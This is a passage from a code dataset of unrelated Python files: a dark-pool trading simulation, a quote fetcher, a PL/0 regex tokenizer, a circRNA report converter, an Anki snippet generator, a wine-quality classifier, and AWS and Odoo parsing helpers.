reputational score of the trader.\n\n\n def __str__(self):\n return '[TID %s type %s balance %s blotter %s customer order %s n_trades %s profitpertime %s]' \\\n % (self.trader_id, self.ttype, self.balance, self.blotter, self.customer_order, self.n_trades, self.profitpertime)\n\n\n def add_order(self, customer_order, verbose):\n # in this version, trader has at most one order,\n # if allow more than one, this needs to be self.orders.append(order)\n if self.n_quotes > 0 :\n # this trader has a live quote on the LOB, from a previous customer order\n # need response to signal cancellation/withdrawal of that quote\n response = 'LOB_Cancel'\n else:\n response = 'Proceed'\n self.customer_order = customer_order\n if verbose : print('add_order < response=%s' % response)\n self.quantity_remaining = customer_order.quantity\n return response\n\n\n def del_order(self):\n # this is lazy: assumes each trader has only one customer order with quantity=1, so deleting sole order\n # 
CHANGE TO DELETE THE HEAD OF THE LIST AND KEEP THE TAIL\n self.customer_order = None\n\n\n def bookkeep(self, trade, verbose):\n\n outstr=str(self.customer_order)\n\n self.blotter.append(trade) # add trade record to trader's blotter\n # NB What follows is **LAZY** -- assumes all orders are quantity=1\n transactionprice = trade['price']\n if self.customer_order.otype == 'Buy':\n profit = (self.customer_order.price - transactionprice) * trade['quantity']\n elif self.customer_order.otype == 'Sell':\n profit = (transactionprice - self.customer_order.price) * trade['quantity']\n self.balance += profit\n self.n_trades += 1\n self.profitpertime = self.balance/(trade['time'] - self.birthtime)\n\n if verbose: print('%s profit=%d balance=%d profit/time=%d' % (outstr, profit, self.balance, self.profitpertime))\n\n # update the quantity remaining\n self.quantity_remaining -= trade['quantity']\n if self.quantity_remaining == 0:\n self.del_order()\n\n\n # specify how trader responds to events in the market\n # this is a null action, expect it to be overloaded by specific algos\n def respond(self, time, lob, trade, verbose):\n return None\n\n # specify how trader mutates its parameter values\n # this is a null action, expect it to be overloaded by specific algos\n def mutate(self, time, lob, trade, verbose):\n return None\n\n\n# Modified Giveaway Trader\nclass Trader_BDS_Giveaway(Trader):\n\n def getorder(self, time):\n # if the trader has no customer order then return None\n if self.customer_order == None:\n order = None\n\n elif self.quantity_remaining > 0:\n\n # if the quantity remaining is above the BI threshold then issue a block indication\n if self.quantity_remaining >= self.BI_threshold:\n\n # the minimum execution size for the order\n MES = 100\n\n # create the block indication\n block_indication = Block_Indication(time,\n self.trader_id,\n self.customer_order.otype,\n self.quantity_remaining,\n self.customer_order.price,\n MES)\n\n # update the lastquote member variable\n self.lastquote = block_indication\n\n # return the block indication\n return block_indication\n\n # otherwise issue a normal order\n else:\n\n # the minimum exeuction size for the order\n MES = None\n\n # create the order\n order = Order(time, \n self.trader_id, \n self.customer_order.otype,\n self.quantity_remaining,\n self.customer_order.price,\n MES)\n\n # update the last quote member variable\n self.lastquote=order\n\n # return the order\n return order\n\n # the trader recieves an Order Submission Request (OSR). The trader needs to respond with a\n # Qualifying Block Order (QBO) in order to confirm their block indication. 
\n def get_qualifying_block_order(self, time, OSR):\n\n # Update the traders reputationa score\n self.reputational_score = OSR.reputational_score\n \n quantity = OSR.quantity * 0.5\n limit_price = OSR.limit_price\n MES = OSR.MES\n\n # create a QBO from the received OSR\n QBO = Qualifying_Block_Order(time, \n OSR.trader_id, \n OSR.otype, \n quantity,\n limit_price,\n MES, \n OSR.match_id)\n # return the created QBO\n return QBO\n\n # if the block indication or the qualifying block order failed\n def BDS_failure(self, info):\n return\n\n\n# This trader's behaviour is deterministic and is used for testing purposes\nclass Trader_BDS_Giveaway_test(Trader):\n\n def getorder(self, time):\n # if the trader has no customer order then return None\n if self.customer_order == None:\n order = None\n\n elif self.quantity_remaining > 0:\n\n # if the quantity remaining is above the BI threshold then issue a block indication\n if self.quantity_remaining >= self.BI_threshold:\n \n MES = 20\n\n # create the block indication\n block_indication = Block_Indication(time,\n self.trader_id,\n self.customer_order.otype,\n self.quantity_remaining,\n self.customer_order.price,\n MES)\n\n # update the lastquote member variable\n self.lastquote = block_indication\n\n # return the block indication\n return block_indication\n\n # otherwise issue a normal order\n else: \n \n MES = 2\n\n # create the order\n order = Order(time, \n self.trader_id, \n self.customer_order.otype, \n self.quantity_remaining,\n self.customer_order.price,\n MES)\n\n # update the last quote member variable\n self.lastquote=order\n\n #return the order\n return order\n\n # the trader recieves an Order Submission Request (OSR). The trader needs to respond with a\n # Qualifying Block Order (QBO) in order to confirm their block indication. 
\n def get_qualifying_block_order(self, time, OSR):\n\n # Update the traders reputationa score\n self.reputational_score = OSR.reputational_score\n \n # If we are testing then use a deterministic quantity\n quantity = OSR.quantity - 100\n limit_price = OSR.limit_price\n MES = OSR.MES\n\n # create a QBO from the received OSR\n QBO = Qualifying_Block_Order(time, \n OSR.trader_id, \n OSR.otype, \n quantity,\n limit_price,\n MES, \n OSR.match_id)\n # return the created QBO\n return QBO\n\n # if the block indication or the qualifying block order failed\n def BDS_failure(self, info):\n return\n","sub_path":"dark_pool/trader.py","file_name":"trader.py","file_ext":"py","file_size_in_byte":9480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"615031210","text":"import requests\nimport random\nimport csv\n\n\ndef get_unique_quote(number):\n unique_quotes = []\n quote_dict = {}\n while len(unique_quotes) != number:\n url = \"http://api.forismatic.com/api/1.0/\"\n params = {\"method\": \"getQuote\",\n \"format\": \"json\",\n \"key\": random.randint(1, 999999)\n }\n response = requests.get(url, params=params)\n raw_quote = response.json()\n if len(raw_quote['quoteAuthor']) != 0:\n quote_dict['Author'] = raw_quote['quoteAuthor']\n quote_dict['Quote'] = raw_quote['quoteText']\n quote_dict['URL'] = raw_quote['quoteLink']\n unique_quotes.append(quote_dict)\n quote_dict = {}\n return unique_quotes\n\n\ndef write_to_csv(number, filename='unique_quotes.csv'):\n data = get_unique_quote(number)\n sorted_data_by_author_name = sorted(data, key=lambda x: x.get('Author'))\n fieldnames = data[0].keys()\n with open(filename, \"w\") as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerows(sorted_data_by_author_name)\n\n\nwrite_to_csv(5)","sub_path":"homework/dz12.py","file_name":"dz12.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"151236959","text":"#\n# docs:\n# https://docs.python.org/3/howto/regex.html\n# https://docs.python.org/3.4/library/re.html\n#\n\nimport re\n\nfile_name='data/sample.pl0.in'\nstream=\"\"\n\n\nwith open(file_name) as f:\n\tstream = f.read()\n\n#print(stream)\n\n#\n# replace keywords with KEYWORD\n# and save in sample.pl0.py.keywords.out \n#\nkeywords = re.compile('(const|var|procedure|call|begin|end|if|then|while|do)(\\W)', re.IGNORECASE)\nkeywords_stream = re.sub(keywords, 'KEYWORD\\g<2>', stream)\nwith open('data/sample.pl0.py.keywords.out', 'w+') as out:\n out.write(keywords_stream)\n#print(keywords_stream)\n\n\n#\n# replace comments with COMMENT\n# and save in sample.pl0.py.comments.out \n#\ncomments = re.compile('(\\s*)(\\/\\/.*)', re.IGNORECASE)\ncomments_stream = re.sub(comments, '\\g<1>COMMENT', stream)\nwith open('data/sample.pl0.py.comments.out', 'w+') as out:\n out.write(comments_stream)\n#print(comments_stream)\n\n#\n# replace identifiers with IDENTIFIER\n# and save in sample.pl0.py.identifiers.out \n#\n# using lookbehind ?= 0.9 and decoy < circ * 0.1\n\n\ndef _is_this_r1_only_glm_bsj_positive(parts):\n if not parts:\n return False\n pv = float(parts[2])\n return pv >= 0.9 # this is also from KNIFE github page\n\n\ndef _is_this_combined_glm_bsj_positive(parts):\n if not parts:\n return False\n threshold_posterior = 0.9\n p_orig = float(parts[2])\n p_swap = float(parts[4])\n return p_orig >= threshold_posterior or p_swap >= threshold_posterior\n\n\ndef 
_is_this_combined_denovo_bsj_positive(parts):\n \"\"\" junction\torig_circOrLinear\torig_decoyOrAnom\torig_unmapped\torig_pval\tswapped_circOrLinear\tswapped_decoyOrAnom\tswapped_unmapped\tswapped_pval\ttotal_reads\n \"\"\"\n if not parts:\n return False\n\n pv_threshold = 0.9\n reads_rate_threshold = 0.1\n orig_circOrLinear, orig_decoyOrAnom, orig_pval = int(parts[1]), int(parts[2]), float(parts[4])\n swapped_circOrLinear, swapped_decoyOrAnom, swapped_pval = int(parts[5]), int(parts[6]), float(parts[8])\n\n by_r1 = orig_pval >= pv_threshold # and orig_decoyOrAnom < orig_circOrLinear * reads_rate_threshold\n by_r2 = swapped_pval >= pv_threshold # and swapped_decoyOrAnom < swapped_circOrLinear * reads_rate_threshold\n return by_r1 or by_r2\n\n\ndef _bsj_junction_to_bed(info_str, gene_id_mapping=None):\n \"\"\"junction: chr|gene1_symbol:splice_position|gene2_symbol:splice_position|junction_type|strand\n junction types are reg (linear),\n rev (circle formed from 2 or more exons),\n or dup (circle formed from single exon)\n \"\"\"\n\n seq_name, gene_splice_1, gene_splice_2, junction_type, strand = info_str.strip().split(\"|\")\n if junction_type == \"reg\":\n return None\n else:\n gene1, splice_1 = gene_splice_1.strip().split(\":\")\n gene2, splice_2 = gene_splice_2.strip().split(\":\")\n\n start_point = splice_1 if int(splice_1) < int(splice_2) else splice_2\n end_point = splice_2 if int(splice_1) < int(splice_2) else splice_1\n\n gene_name = gene1 if gene1 == gene2 else \"n/a\"\n field_gene = gene_id_mapping.get(gene_name, \"n/a\") if gene_id_mapping else gene_name\n\n name_bsj = \"{chr}:{start_nt}|{end_nt}@{gene}\".format(chr=seq_name, start_nt=str(int(start_point) + 1),\n end_nt=end_point,\n gene=field_gene)\n return \"\\t\".join([seq_name, start_point, end_point, name_bsj, \"0\", strand])\n\n\ndef __dump_bed_line_list_to(all_bed_lines, output_bed_file_path):\n with open(output_bed_file_path, \"w\") as op:\n for line in all_bed_lines:\n op.write(\"{}\\n\".format(line.strip()))\n\n\ndef pick_glm_report(file_name):\n return file_name.strip().endswith(\"circJuncProbs.txt\")\n\n\ndef pick_denovo_report(file_name):\n return file_name.strip().endswith(\"report.txt\") and \"unaligned\" not in file_name\n\n\ndef __get_file_under(tap_root, sub_dir, func_to_pick_report):\n report_sub_dir = os.path.join(tap_root, sub_dir)\n if os.path.exists(report_sub_dir) and os.path.isdir(report_sub_dir):\n contents_file = os.listdir(report_sub_dir)\n if contents_file:\n file_you_need = [x.strip() for x in contents_file if func_to_pick_report(x.strip())][0]\n return os.path.join(report_sub_dir, file_you_need)\n else:\n raise FileNotFoundError(\"no files under this folder: {}\".format(report_sub_dir))\n else:\n raise NotADirectoryError(\"no such folder: {}.\".format(report_sub_dir))\n\n\ndef transform_each_line(report_file, func_to_check_bsj, header_line_num, gene_id_mapping=None):\n bed_lines_this_file = []\n with open(report_file) as report_it:\n for x in range(header_line_num):\n report_it.readline()\n for line in report_it:\n _process_line(line, bed_lines_this_file, func_to_check_bsj, gene_id_mapping)\n return bed_lines_this_file\n\n\ndef __report_glm_combined(dir_knife, gene_id_mapping=None):\n # here we assume the combined glm report is that file with suffix: circJuncProbs.txt under the\n # circReads/combinedReports folder .\n report_file = __get_file_under(dir_knife, _SUB_DIR_COMBINED_REPORT, pick_glm_report)\n\n _logger.debug(\"now loading {}\".format(report_file))\n\n bed_lines_this_file = 
transform_each_line(report_file, _is_this_combined_glm_bsj_positive, 1, gene_id_mapping)\n\n return bed_lines_this_file\n\n\ndef __report_glm_read1_only(dir_knife, gene_id_mapping=None):\n report_file = __get_file_under(dir_knife, _SUB_DIR_READ1_GLM_REPORT, pick_glm_report)\n _logger.debug(\"now loading {}\".format(report_file))\n bed_outputs = transform_each_line(report_file, _is_this_r1_only_glm_bsj_positive, 1, gene_id_mapping)\n return bed_outputs\n\n\ndef __report_denovo_combined(dir_knife, gene_id_mapping=None):\n report_file = __get_file_under(dir_knife, _SUB_DIR_COMBINED_REPORT, pick_denovo_report)\n _logger.debug(\"now loading {}\".format(report_file))\n bed_contents = transform_each_line(report_file, _is_this_combined_denovo_bsj_positive, 1, gene_id_mapping)\n return bed_contents\n\n\ndef __report_denovo_read1_only(dir_knife, gene_id_mapping=None):\n report_file = __get_file_under(dir_knife, _SUB_DIR_READ1_DENOVO_REPORT, pick_denovo_report)\n _logger.debug(\"now loading {}\".format(report_file))\n bed_lines = transform_each_line(report_file, _is_this_r1_only_denovo_bsj_positive, 2, gene_id_mapping)\n return bed_lines\n\n\n# here we confirmed that this is a configuration file\ndef __infer_knife_output_directory(cfg_file):\n if os.path.exists(cfg_file) and os.path.isfile(cfg_file):\n user_config = pysrc.body.config.config(cfg_file)\n dir_par = user_config[pysrc.wrapper.knife.SECTION_DETECT][pysrc.wrapper.knife._OPT_ALIGNMENT_PARENT_DIRECTORY]\n dir_object = user_config[pysrc.wrapper.knife.SECTION_DETECT][pysrc.wrapper.knife._OPT_DATA_SET_NAME]\n putative_dir = os.path.join(dir_par, dir_object)\n if os.path.exists(putative_dir) and os.path.isdir(putative_dir):\n return putative_dir\n else:\n raise NotADirectoryError(\"Unable to get the right path from : {}.\".format(cfg_file))\n else:\n raise FileNotFoundError(\"Unable to find the cfg_file in : {}.\".format(cfg_file))\n\n\ndef main(cfg_path, is_conserve, is_use_swapped, anno_file):\n dir_knife_output = __infer_knife_output_directory(cfg_path)\n\n gene_name_id_mapping = load_mapping_info_from_gtf(anno_file) if anno_file and os.path.exists(anno_file) else None\n\n if is_conserve: # use only glm report\n if is_use_swapped: # glm_combined\n bed_lines = __report_glm_combined(dir_knife_output, gene_name_id_mapping)\n else: # glm_r1\n bed_lines = __report_glm_read1_only(dir_knife_output, gene_name_id_mapping)\n else:\n if is_use_swapped: # glm_combined, and denovo_combined\n bed_lines = __report_glm_combined(dir_knife_output, gene_name_id_mapping)\n bed_lines.extend(__report_denovo_combined(dir_knife_output, gene_name_id_mapping))\n else: # glm_r1 and denovo_r1\n bed_lines = __report_glm_read1_only(dir_knife_output, gene_name_id_mapping)\n bed_lines.extend(__report_denovo_read1_only(dir_knife_output, gene_name_id_mapping))\n\n bed_path = os.path.join(dir_knife_output, BED_FORMAT_OUTPUT_FILE_NAME)\n __dump_bed_line_list_to(bed_lines, bed_path)\n return bed_path\n\n\ndef __cli_arg_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"cfg_file\", help=\"path to the config file, KNIFE setting is required\")\n parser.add_argument(\"-c\", \"--conserve\", help=\"use annotation powered glm report only\", action=\"store_true\")\n parser.add_argument(\"-s\", \"--use_swapped\", help=\"use both reads instead only read 1\", action=\"store_true\")\n parser.add_argument(\"-a\", \"--anno\", help=\"path for annotation file , which provide the name id mapping info\",\n default=\"\")\n return parser\n\n\nif __name__ == \"__main__\":\n 
arg_parser = __cli_arg_parser()\n args = arg_parser.parse_args()\n _logger.debug(\"config_file is {}\".format(args.cfg_file))\n _logger.debug(\"use glm only : {}\".format(args.conserve))\n _logger.debug(\"use combined report : {}\".format(args.use_swapped))\n _logger.debug(\"user defined annotation file: {}\".format(args.anno))\n print(main(args.cfg_file, args.conserve, args.use_swapped, args.anno))\n","sub_path":"trans_knife_report.py","file_name":"trans_knife_report.py","file_ext":"py","file_size_in_byte":10348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"5014906","text":"\"\"\"\nThis code preprocesses captions from a CSV file, and saves it as a json.\n\njson file will have the form (a list of dictionaries)\n[{ file_loc: 'path/to/image/set/',\n file_names: ['1.jpg', '2.jpg', ...],\n captions: ['sentence_1', 'sentence_2', ...],\n id: }, ...]\n\nTO DO: Modify so that it processes folders with <10 images as well\n\"\"\"\n\nimport os\nimport json\nimport csv\n\ndata_paths = list(os.walk('/local-scratch2/ajakash/aabdujyo/2017_set_compression/Data/Sets_12500'))\n\nwith open('sets/Category Image Description - Sheet1.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n# reader_utf_8 = utf_8_encoder(reader)\n\n out = []\n # Add a dictionary of items per image set\n for row in reader:\n if row[1] == 'Description' or row[1] == 'Empty':\n continue\n\n #print row\n\n filenames = [x[0].split('/')[-1] for x in data_paths]\n loc = filenames.index(row[0])\n #print loc\n #print data_paths[loc]\n\n # Currently taking\n if len(data_paths[loc][2]) == 10:\n set_info = {}\n set_info['file_loc'] = data_paths[loc][0]\n set_info['file_names'] = data_paths[loc][2]\n\n caption = row[1].split('.')\n if caption[-1]=='':\n caption = caption[:-1]\n\n set_info['captions'] = caption\n set_info['id'] = loc\n\n #print set_info\n out.append(set_info)\n\n json.dump(out, open('sets/sets_raw.json', 'w'))\n\n #print out","sub_path":"preprocess_sets.py","file_name":"preprocess_sets.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"297741883","text":"# -*- coding: utf-8 -*-\n\n#******************************************************************************\n# gen boost snip.py, the main program file\n#\n# TreeLine, an information storage program\n# Copyright (C) 2017, Michael Cold\n#\n# This is free software; you can redistribute it and/or modify it under the\n# terms of the GNU General Public License, either Version 2 or any later\n# version. This program is distributed in the hope that it will be useful,\n# but WITTHOUT ANY WARRANTY. See the included LICENSE file for details.\n#******************************************************************************\n\n\"\"\"\n Module give opportunity to generate anki-data cards from boost snippets\n The type of cards for anki - 'passes'\n The fields - 'name of theme' - 'snippet'\n Algoritm: take header '### ' as 'name of theme'\n take text in '''_____''' as 'snippet'\n Intermediate format of data is dbas SQLite in order to backup data\n 1. insert data into DB\n 2. 
generate data from DB\n\"\"\"\n\nimport os\nimport m_sqlite\nimport codecs\nimport sys\nimport generator\nfrom peewee import *\n\n\n__progname__ = 'gen boost snip'\n__version__ = '0.1.0'\n__author__ = 'Michael Cold'\n\ndb = SqliteDatabase(r'C:\\Users\\mcold\\Dropbox\\Python projects\\anki prop from boost\\snips.db')\n\ndef gen_dirs(dir_path):\n \"\"\"\n Generate dictionary of direoctories boosts\n :param dir_path: root of direcotry boosts\n :return: dictionary of dirs boosts\n \"\"\"\n # dir_path = r'C:\\Users\\mcold\\Dropbox\\boosts'\n l_dirs_boosts = os.listdir(dir_path) # list of dirs boosts\n d_dirs = dict()\n dir_path = '{0}\\\\'.format(dir_path)\n dir_path.replace(r'\\\\\\\\', r'\\\\')\n for k in range(len(l_dirs_boosts)):\n dir_boost = dir_path + l_dirs_boosts[k]\n d_dirs[l_dirs_boosts[k]] = dir_boost\n return d_dirs\n\ndef take_dirs():\n \"\"\"\n Generate dictionary of direoctories boosts\n :return: dictionary of dirs boosts\n \"\"\"\n dir_path = ''\n if sys.platform.startswith('win'):\n dir_path = r'C:\\Users\\mcold\\Dropbox\\boosts'\n else:\n dir_path = r'/home/mcold/Dropbox/boosts/'\n d_dirs = gen_dirs(dir_path)\n return d_dirs\n\ndef take_file_dir(dir):\n \"\"\"\n Take names of files with snippets from directory\n :param: directory\n :return: list of files .cson (boosts) in dir\n \"\"\"\n dir = dir + '\\\\notes'\n ls = os.listdir(dir)\n l_snips = list()\n for i in range(len(ls)):\n if ls[i].endswith(\".cson\"):\n l_snips.append(ls[i])\n return l_snips\n\n\ndef ins_snips_dir(l_snips, s_dir, s_storage):\n \"\"\"\n Function return list of snips for 1 storage\n :param l_snips: files of snippets\n :param dir: directory of files\n :return: headers of snips\n \"\"\"\n\n b_found_title = False # bool found title of snippet\n b_found_snip = False # bool found snip\n b_found_sub = False # bool found substitution\n s_title = '' # title of snippet\n s_snip = '' # snippet\n\n\n\n for i in range(len(l_snips)):\n name_file = s_dir + '\\\\notes\\\\' + l_snips[i]\n f_snip = codecs.open(name_file, \"r\", \"utf-8\")\n # f_snip = open(r'{0}'.format(name_file), \"r\")\n while True:\n line = f_snip.readline()\n line = line.strip()\n if line.startswith('### '):\n b_found_title = True\n if line.find(\"''''\") > 0:\n if b_found_snip == True: # if had found snip yet -> write to DB\n # -> False - snip is gone out\n if b_found_title and b_found_sub: # so insert data into db\n m_sqlite.ins_data(s_title, s_snip, s_storage)\n b_found_snip = False\n b_found_title = False\n b_found_sub = False\n s_title = '' # & title is empty\n s_snip = '' # & snip is empty\n else:\n b_found_snip = True\n if line.find('{{') > 0:\n b_found_sub = True\n if b_found_title and b_found_snip: # if title and snip found add to text of snip\n s_snip = s_snip + line\n if line.startswith('updatedAt:'):\n break\n f_snip.close()\n\n\ndef add_div_line(line):\n \"\"\"\n Add
<div> in sides of line\n\n    :param line: string\n    :return: string with <div>...</div>\n    \"\"\"\n    res = '<div>' + line + '</div>
'\n return res\n\n\n\ndef ins_snips_file(s_file, s_storage):\n b_found_title = False # bool found title of snippet\n b_found_snip = False # bool found snip\n b_found_sub = False # bool found substitution\n s_title = '' # title of snippet\n s_snip = '' # snippet\n n_empty = 0 # define condition break cycle\n f_snip = codecs.open(s_file, \"r\", \"utf8\")\n # f_snip = open(r'{0}'.format(name_file), \"r\")\n\n\n l = f_snip.read().split('\\n')\n # line = f_snip.readline()\n\n\n for i in range(len(l)):\n if l[i].find('##') > 0:\n s_title = an_line(l[i])\n b_found_title = True\n if l[i].find(\"```\") > 0:\n if b_found_snip == True: # if had found snip yet -> write to DB\n # -> False - snip is gone out\n if b_found_title and b_found_sub: # so insert data into db\n try:\n ins_data(s_title, s_snip, s_storage)\n except:\n continue\n b_found_snip = False\n b_found_title = False\n b_found_sub = False\n s_title = '' # & title is empty\n s_snip = '' # & snip is empty\n else:\n b_found_snip = True\n if l[i].find('{{') > 0:\n b_found_sub = True\n if b_found_title and b_found_snip: # if title and snip found add to text of snip\n if l[i].find(\"```\") > 0:\n continue\n s_snip = s_snip + add_div_line(l[i])\n n_empty = 0\n if l[i].startswith('updatedAt:'):\n break\n if l[i] == '' or l[i] == '\\n':\n n_empty += 1\n if n_empty == 4:\n break\n\n f_snip.close()\n\n\n\n\n\ndef an_line(line):\n \"\"\"\n Function for analyze line of file - for reduce ## in start of line\n :param line: line of file\n :return: line without # symbols\n \"\"\"\n res = ''\n for i in range(len(line)):\n if not line[i] == '#':\n res = res + line[i]\n return res.strip() + '\\n'\n\ndef cycle_dir():\n \"\"\"\n Function execute cycle of generation anki-cards\n :return:\n \"\"\"\n m_sqlite.cr_db_table() # create database & table snip\n d_dirs = take_dirs()\n for k in d_dirs:\n name_storage = k\n l_files = take_file_dir(d_dirs[k]) # take files from each dir\n # snips = ins_snips_dir(l_files, d_dirs[k], name_storage)\n for i in range(len(l_files)):\n ins_snips_file(d_dirs[k] + '\\\\notes\\\\' + l_files[i], k)\n\n\nclass snip(Model):\n id = IntegerField()\n c_storage = CharField()\n c_title = CharField(unique=True) # title of snippet\n c_snip = CharField() # snippet\n\n class Meta:\n database = db\n\n\ndef next_id(instance):\n \"\"\"\n Count next id of item for instance\n :param instance:\n :return: next id\n \"\"\"\n # find max value of temp_id in model\n # increment it by one and assign it to model instance object\n try:\n e = instance.__name__ + '.select(fn.Max(' + instance.__name__ + '.id))[0].id + 1'\n next_value = eval(e)\n except:\n next_value = 1\n return next_value\n\n\ndef take_snips():\n \"\"\"\n Take list of snips\n :return:\n \"\"\"\n l = []\n for s in snip.select():\n l.append(s.c_author)\n return l\n\n\ndef cr_db_table():\n \"\"\"\n Create database and table snip in that\n :return:\n \"\"\"\n try:\n db = SqliteDatabase('snip.db')\n except:\n pass\n try:\n snip.create_table()\n\n except:\n pass\n\n\ndef ins_data(s_title, s_snip, s_storage):\n \"\"\"\n Insert data into table snips\n :param s_title: title\n :param s_snip: snippet\n :return:\n \"\"\"\n\n snip.create(id=next_id(snip), c_title=s_title, c_snip=s_snip, c_storage=s_storage)\n\n try:\n snip.create(id = next_id(snip), c_title = s_title, c_snip = s_snip, c_storage = s_storage)\n except:\n pass\n\ndef take_list_ins():\n s_storage = os.path.abspath(os.curdir).split('\\\\')[-1]\n l_files = []\n ls = os.listdir()\n for i in range(len(ls)):\n if ls[i].endswith('.cson'):\n 
l_files.append(ls[i])\n for j in range(len(l_files)):\n ins_snips_file((l_files[j]), s_storage)\n\nif __name__ == '__main__':\n cycle_dir() # insert data\n generator.generate_data() # generate data\n\n","sub_path":"gen_boost_snip.py","file_name":"gen_boost_snip.py","file_ext":"py","file_size_in_byte":8909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"594479050","text":"from habbohotel.Game import Game\nfrom messages.incoming.ClientMessage import ClientMessage\n\n\nclass MessageDecoder:\n\n @staticmethod\n def parse(session, msg):\n if msg[0] == 60:\n session.send(\"\\r\\n\"\n + \"\\r\\n\"\n + \"\\r\\n\"\n + \"\\r\\n\"\n + \"\\0\")\n else:\n stream = ClientMessage(msg)\n length = stream.read_int()\n header = stream.read_short()\n\n Game.packet_handler.handle_message(session, header, stream)","sub_path":"messages/codec/MessageDecoder.py","file_name":"MessageDecoder.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"283287498","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import GradientBoostingClassifier\ndata=pd.read_csv('red.csv')\nx=data[['fixed acidity','volatile acidity','citric acid','residual sugar','chlorides','free sulfur dioxide','total sulfur dioxide','density','pH','sulphates','alcohol']]\ny=data['quality']\nclf=GradientBoostingClassifier(n_estimators=82, learning_rate=0.1,max_depth=1, random_state=0)\nclf.fit(x,y)\ntest=pd.read_csv('red_test.csv')\nx=test[['fixed acidity','volatile acidity','citric acid','residual sugar','chlorides','free sulfur dioxide','total sulfur dioxide','density','pH','sulphates','alcohol']]\ny=test['quality']\np=clf.predict(x)\nprint(clf.score(x,y))\nprint(clf.feature_importances_)\n","sub_path":"red_gradboost.py","file_name":"red_gradboost.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"58157257","text":"import json\nfrom parsers.aws_parser import AWSParser\nfrom models.subnet import Subnet\n\nclass SubnetParser(AWSParser):\n \n def parse(self):\n parsed_subnets = []\n for subnet in self.json[\"Subnets\"]:\n cur_subnet = Subnet()\n cur_subnet.subnet_id = subnet[\"SubnetId\"]\n cur_subnet.vpc_id = subnet[\"VpcId\"]\n cur_subnet.availability_zone = subnet[\"AvailabilityZone\"]\n cur_subnet.available_ip_address_count = subnet[\"AvailableIpAddressCount\"]\n cur_subnet.cidr = subnet[\"CidrBlock\"]\n cur_subnet.state = subnet[\"State\"]\n cur_subnet.tags = self.get_tag_dict(subnet.get(\"Tags\",[]))\n parsed_subnets.append(cur_subnet)\n return parsed_subnets\n\n","sub_path":"parsers/subnet_parser.py","file_name":"subnet_parser.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"611700420","text":"#Theft and Fraud model\nimport random\nimport sys\nimport numpy as np\nimport scipy.stats as sp\nimport matplotlib.pyplot as plt\n\ndef transaction(array):\n\t#Randomly select two traders\n\ttraderA = random.randint(0,int(sys.argv[1])-1)\n\ttraderB = random.randint(0,int(sys.argv[1])-1)\n\twhile traderA == traderB:\n\t\ttraderB = random.randint(0,int(sys.argv[1])-1)\n\ttraderAworth = array[traderA]\n\ttraderBworth = array[traderB]\n\n\t#Randomly generate a profit for one trader equal to the loss of the other trader\n\t#In this model, the profit is some fraction of the loser's worth\n\tprofit = 
random.randint(0, traderBworth)\n\ttraderAworth += profit\n\ttraderBworth -= profit\n\tarray[traderA] = traderAworth\n\tarray[traderB] = traderBworth\n\n\t#Return updated array of traders and their worths\n\treturn array\n\n#Initialize an array of traders all with net worth 100\ntraders = [100]*int(sys.argv[1])\n\n#Run a specified number of transactions\nfor i in range(0,int(sys.argv[2])):\n\ttraders = transaction(traders)\n\n#Show results\n#print traders\n\n#Calculate percentiles and create histogram data\npercentiles = [sp.percentileofscore(traders, i) for i in traders]\ndata = []\n\n#This is my cheat for creating data that represents the wealth distribution.\n#There's got to be a python library for this\nfor i in range (0,len(traders)):\n\tif traders[i] != 0:\n\t\tdata = data + [percentiles[i]]* traders[i]\n\nbins = [0,10,20,30,40,50,60,70,80,90,100]\n\n#Plot results as histogram\nplt.hist(data, bins)\nplt.title(\"Theft-and-fraud model of \" + str(sys.argv[1]) + \" traders after \" + str(sys.argv[2]) + \" transactions\")\nplt.xlabel(\"Percentile\")\nplt.ylabel(\"Wealth\")\nplt.show()\n","sub_path":"YardsaleEcon/theftandfraud.py","file_name":"theftandfraud.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"134083044","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Author: Nicolas Bessi\n# Copyright 2014 Camptocamp SA\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
If not, see <http://www.gnu.org/licenses/>.\n#\n##############################################################################\nfrom openerp.addons.connector.unit.mapper import ImportMapper\nfrom openerp.addons.connector.exception import MappingError\n\n\nclass AddressMapper(ImportMapper):\n\n    def _state_id(self, record, state_key, country_key):\n        state = record.get(state_key)\n        if not state:\n            return False\n        state_id = self.session.search(\n            'res.country.state',\n            [('name', '=', state)]\n        )\n        if state_id:\n            return state_id[0]\n        else:\n            country_id = self._country_id(record, country_key)\n            if country_id:\n                return self.session.create(\n                    'res.country.state',\n                    {'name': state,\n                     'country_id': country_id}\n                )\n        return False\n\n    def _country_id(self, record, country_key):\n        \"\"\"Map Salesforce countrycode to Odoo code\"\"\"\n        country_code = record.get(country_key)\n        if not country_code:\n            return False\n        country_id = self.session.search(\n            